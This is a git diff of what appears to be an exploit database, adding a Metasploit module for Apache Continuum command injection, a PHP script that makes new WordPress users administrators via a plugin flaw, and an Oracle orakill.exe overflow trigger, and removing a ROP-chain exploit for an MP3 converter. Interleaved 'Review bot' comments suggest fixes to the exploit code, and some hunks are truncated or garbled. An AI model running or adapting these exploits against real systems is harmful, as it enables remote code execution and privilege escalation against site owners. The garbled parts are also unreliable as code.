diff --git a/files.csv b/files.csv
index 342d3dd26..9c4dabbc4 100755
--- a/files.csv
+++ b/files.csv
@@ -36111,7 +36111,6 @@ id,file,description,date,author,platform,type,port
 39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0
 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80
 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
-39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass",2016-06-13,"Fitzl Csaba",windows,local,0
 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
@@ -36123,3 +36122,6 @@ id,file,description,date,author,platform,type,port
 39942,platforms/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos,0
 39943,platforms/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
 39944,platforms/linux/dos/39944.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
+39945,platforms/linux/remote/39945.rb,"Apache Continuum Arbitrary Command Execution",2016-06-14,metasploit,linux,remote,8080
+39946,platforms/php/webapps/39946.php,"WordPress Social Stream Plugin 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80
+39947,platforms/windows/dos/39947.py,"Oracle Orakill.exe 11.2.0 - Buffer Overflow",2016-06-14,hyp3rlinx,windows,dos,0
diff --git a/platforms/linux/remote/39945.rb b/platforms/linux/remote/39945.rb
new file mode 100755
index 000000000..f8aead12e
--- /dev/null
+++ b/platforms/linux/remote/39945.rb
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Apache Continuum Arbitrary Command Execution',
+ 'Description' => %q{
+ This module exploits a command injection in Apache Continuum <= 1.4.2.
+ By injecting a command into the installation.varValue POST parameter to
+ /continuum/saveInstallation.action, a shell can be spawned.
+ },
+ 'Author' => [
+ 'David Shanahan', # Proof of concept
+ 'wvu' # Metasploit module
+ ],
+ 'References' => [
+ %w{EDB 39886}
+ ],
+ 'DisclosureDate' => 'Apr 6 2016',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86, ARCH_X86_64],
+ 'Privileged' => false,
+ 'Targets' => [
+ ['Apache Continuum <= 1.4.2', {}]
+ ],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options([
+ Opt::RPORT(8080)
+ ])
+ end
+
+ def check
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/continuum/about.action'
+ )
+
+ if res && res.body.include?('1.4.2')
+ CheckCode::Appears
+ elsif res && res.code == 200
+ CheckCode::Detected
+ else
+ CheckCode::Safe
+ end
+ end
+
+ def exploit
+ print_status('Injecting CmdStager payload...')
+ execute_cmdstager(flavor: :bourne)
+ end
+
+ def execute_command(cmd, opts = {})
+ send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => '/continuum/saveInstallation.action',
+ 'vars_post' => {
+ 'installation.name' => Rex::Text.rand_text_alpha(8),
+ 'installation.type' => 'jdk',
+ 'installation.varValue' => '`' + cmd + '`'
+ }
+ )
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/39946.php b/platforms/php/webapps/39946.php
new file mode 100755
index 000000000..a7069a023
--- /dev/null
+++ b/platforms/php/webapps/39946.php
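Review bot: `check` returns `CheckCode::Appears` only when the about page contains the literal substring `1.4.2`, while the target entry and description cover `<= 1.4.2`, so every earlier affected version falls through to `Detected`; a comment such as `# Only 1.4.2 is fingerprinted; earlier affected versions report Detected` would make that gap visible to whoever maintains the module. The two repeated `res &&` tests in the same method read more cleanly as a guard clause, `return CheckCode::Safe unless res`, followed by the `if`/`elsif` on `res.body` and `res.code`. In `execute_command` the `opts` parameter is accepted but never read; if the CmdStager mixin requires that arity, a one-line comment saying so would stop a reader from treating it as dead.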
@@ -0,0 +1,147 @@ + + * Vendor Homepage: + * Software Link: http://codecanyon.net/item/wordpress-social-stream/2201708?s_rank=15 + * Version: 1.5.15 + * Tested on: Debian 8, PHP 5.6.17-3 + * Type: Authenticated wp_options overwrite + * Time line: Found [14-May-2016], Vendor notified [14-May-2016], Vendor fixed: [v1.5.16 19/05/2016 (Current Version)], [RD:1465606136] + */ + + +require_once('curl.php'); +//OR +//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); +$curl = new CurlWrapper(); + + +$options = getopt("t:m:u:p:f:c:",array('tor:')); +print_r($options); +$options = validateInput($options); + +if (!$options){ + showHelp(); +} + +if ($options['tor'] === true) +{ + echo " ### USING TOR ###\n"; + echo "Setting TOR Proxy...\n"; + $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); + $curl->addOption(CURLOPT_PROXYTYPE,7); + echo "Checking IPv4 Address\n"; + $curl->get('https://dynamicdns.park-your-domain.com/getip'); + echo "Got IP : ".$curl->getResponse()."\n"; + echo "Are you sure you want to do this?\nType 'wololo' to continue: "; + $answer = fgets(fopen ("php://stdin","r")); + if(trim($answer) != 'wololo'){ + die("Aborting!\n"); + } + echo "OK...\n"; +} + + +function logIn(){ + global $curl, $options; + file_put_contents('cookies.txt',"\n"); + $curl->setCookieFile('cookies.txt'); + $curl->get($options['t']); + $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); + $curl->post($options['t'].'/wp-login.php', $data); + $status = $curl->getTransferInfo('http_code'); + if ($status !== 302){ + echo "Login probably failed, aborting...\n"; + echo "Login response saved to login.html.\n"; + die(); + } + file_put_contents('login.html',$curl->getResponse()); + + +} + +function exploit(){ + global $curl, $options; + if ($options['m'] == 'admin_on'){ + echo "\nEnabling Admin mode\n"; + $data = array('action'=>'dcwss_update', 'option_name'=>'default_role', 
'option_value'=>'administrator' ); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + echo "Response: ". $resp."\n"; + + } + if ($options['m'] == 'admin_off'){ + echo "\nDisabling Admin mode\n"; + $data = array('action'=>'dcwss_update', 'option_name'=>'default_role', 'option_value'=>'subscriber' ); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + echo "Response: ". $resp."\n"; + + } +} + + +logIn(); +exploit(); + + + +function validateInput($options){ + + if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ + return false; + } + if ( !isset($options['u']) ){ + return false; + } + if ( !isset($options['p']) ){ + return false; + } + if (!preg_match('~/$~',$options['t'])){ + $options['t'] = $options['t'].'/'; + } + if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){ + return false; + } + if ($options['m'] == 'r' && !isset($options['f'])){ + return false; + } + $options['tor'] = isset($options['tor']); + + return $options; +} + + +function showHelp(){ + global $argv; + $help = << + @link http://github.com/svyatov/CurlWrapper + @license http://www.opensource.org/licenses/mit-license.html MIT License + +EOD; + echo $help."\n\n"; + die(); +} \ No newline at end of file diff --git a/platforms/windows/dos/39947.py b/platforms/windows/dos/39947.py new file mode 100755 index 000000000..1a2165e81 --- /dev/null +++ b/platforms/windows/dos/39947.py 
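Review bot: In `logIn` the failure branch prints `Login response saved to login.html.` and then calls `die()` before the `file_put_contents('login.html', ...)` line is reached, so on a failed login the file is never written and the message is false; move `file_put_contents('login.html',$curl->getResponse());` above the `$status !== 302` check, or drop the message. `validateInput` later tests `$options['m'] == 'r'`, which can never be true because `m` was restricted to `admin_on`/`admin_off` two lines earlier, so that branch and the unused `f`/`c` options in `getopt` look like leftovers from another script. The TOR prompt's `fgets(fopen("php://stdin","r"))` never closes the handle it opens; `fgets(STDIN)` reads the same line without the leak. The hunk's opening header comment and the heredoc in `showHelp` appear truncated in this rendering, so I cannot tell whether the `<?php` tag and the heredoc delimiter are intact in the committed file.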
@@ -0,0 +1,128 @@
+'''
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-ORAKILL.EXE-BUFFER-OVERFLOW.txt
+
+[+] ISR: apparitionsec
+
+
+Vendor:
+==============
+www.oracle.com
+
+
+Product:
+===================
+orakill.exe v11.2.0
+
+
+The orakill utility is provided with Oracle databases on Windows platforms. The executable (orakill.exe) is available to DBAs to kill Oracle
+sessions directly from the DOS command line without requiring any connection to the database.
+
+
+C:\oraclexe\app\oracle\product\11.2.0\server\bin>orakill.exe -h
+
+Usage: orakill sid thread
+
+ where sid = the Oracle instance to target
+ thread = the thread id of the thread to kill
+
+ The thread id should be retrieved from the spid column of a query such as:
+
+ select spid, osuser, s.program from
+ v$process p, v$session s where p.addr=s.paddr
+
+
+Vulnerability Type:
+===================
+Buffer Overflow
+
+
+Reference:
+==========
+http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
+
+
+Vulnerability Details:
+=====================
+
+ToLower() filter being applied to supplied arguments e.g. 'A' \x41 beomes 'a' \x61 etc... may be possible to subvert using encoder
+technique like "ALPHA3". Also we need to supply a second argument of just 4 bytes to trigger the access violation.
+
+orakill.exe <104 bytes>, <4 bytes>
+
+Register dump.
+
+EAX 40000000
+ECX 0018FCA8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaarrrr"
+EDX 00000000
+EBX 61616161
+ESP 0018FD10 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaarrrr"
+EBP 61616161
+ESI 61616161
+EDI 61616161
+EIP 61616161
+C 0 ES 002B 32bit 0(FFFFFFFF)
+P 0 CS 0023 32bit 0(FFFFFFFF)
+A 0 SS 002B 32bit 0(FFFFFFFF)
+Z 0 DS 002B 32bit 0(FFFFFFFF)
+S 0 FS 0053 32bit 7EFDD000(FFF)
+T 0 GS 002B 32bit 0(FFFFFFFF)
+D 0
+O 0 LastErr ERROR_SUCCESS (00000000)
+EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
+ST0 empty g
+ST1 empty g
+ST2 empty g
+ST3 empty g
+ST4 empty g
+ST5 empty g
+ST6 empty g
+ST7 empty g
+ 3 2 1 0 E S P U O Z D I
+FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
+FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
+
+
+Exploit code(s):
+================
+'''
+
+import subprocess
+
+pgm="C:\\oraclexe\\app\\oracle\\product\\11.2.0\\server\\bin\\orakill.exe "
+
+payload="A"*100 + "RRRR"
+subprocess.Popen([pgm, payload, " BBBB"], shell=False)
+
+
+'''
+Disclosure Timeline:
+====================================
+Vendor Notification: October 5, 2015
+Vendor Fix: April 25, 2016
+June 13, 2016 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+================
+Low
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx
+'''
\ No newline at end of file
diff --git a/platforms/windows/local/39933.py b/platforms/windows/local/39933.py
deleted file mode 100755
index 8453994d2..000000000
--- a/platforms/windows/local/39933.py
+++ /dev/null
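Review bot: The advisory text and the code in this file disagree about the second argument: the details section says `<4 bytes>` but the `subprocess.Popen` call passes `" BBBB"`, a five-character string, so one of the two should be corrected to match the other. `beomes` in the same details section is a typo for `becomes`. The `Popen` return value is discarded, so nothing in the script records whether the child started or how it ended; a comment stating that the outcome is meant to be observed in a debugger, which the register dump above implies, would make that intent explicit.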
@@ -1,192 +0,0 @@ -# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass -# Date: 2016-06-12 -# Exploit Author: Csaba Fitzl -# Vendor Homepage: N/A -# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe -# Version: 2.7.3.700 -# Tested on: Windows 7 x64 -# CVE : CVE-2009-1330 - -import struct - -def create_rop_chain(): - - # rop chain generated with mona.py - www.corelan.be - # added missing parts, and some optimisation by Csaba Fitzl - rop_gadgets = [ - - #mov 1000 to EDX - Csaba - 0x41414141, # Filler (compensate) - 0x41414141, # Filler (compensate) - 0x41414141, # Filler (compensate) - 0x10025a1c, # XOR EDX,EDX # RETN - 0x1002bc3d, # MOV EAX,411 # RETN - 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc24, # ADD EAX,80 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1002dc41, # ADD EAX,40 # POP EBP # RETN - 0x41414141, # Filler (compensate) - 0x1001d2ac, # ADD EAX,4 # RETN - 0x1001d2ac, # ADD EAX,4 # RETN - 0x1001d2ac, # ADD EAX,4 # RETN - 0x1001d2ac, # ADD EAX,4 # RETN - 0x1001d2ac, # ADD EAX,4 # RETN - 0x1001d2ac, 
# ADD EAX,4 # RETN - 0x1001d2ac, # ADD EAX,4 # RETN - 0x1001d2ac, # ADD EAX,4 # RETN - 0x1001d2ac, # ADD EAX,4 # RETN - 0x1001d2ac, # ADD EAX,4 # RETN - 0x1001d2ac, # ADD EAX,4 # RETN - 0x10023327, # INC EAX # RETN - 0x10023327, # INC EAX # RETN - 0x10023327, # INC EAX # RETN - # AT this point EAX = 0x1000 - 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] - 0x41414141, # Filler (compensate) - 0x41414141, # Filler (compensate) - 0x41414141, # Filler (compensate) - 0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI - 0x41414141, # Filler (compensate) - - - 0x10026d56, # POP EAX # RETN [MSRMfilter03.dll] - 0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll] - 0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll] - - 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] - 0x41414141, # Filler (compensate) - 0x41414141, # Filler (compensate) - 0x41414141, # Filler (compensate) - 0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll] - 0x1001b058, # & push esp # ret [MSRMfilter03.dll] - 0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll] - 0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx) - 0x1001d2ac, # ADD EAX,4 # RETN - 0x10023327, # INC EAX # RETN - 0x10023327, # INC EAX # RETN - 0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] - 0x41414141, # Filler (compensate) - 0x41414141, # Filler (compensate) - - 0x10029f74, # POP ECX # RETN [MSRMfilter03.dll] - 0xffffffff, # - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # 
AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # 
RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] - 0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll] - 0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll] - 0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll] - 0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP - 0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL - - ] - return ''.join(struct.pack('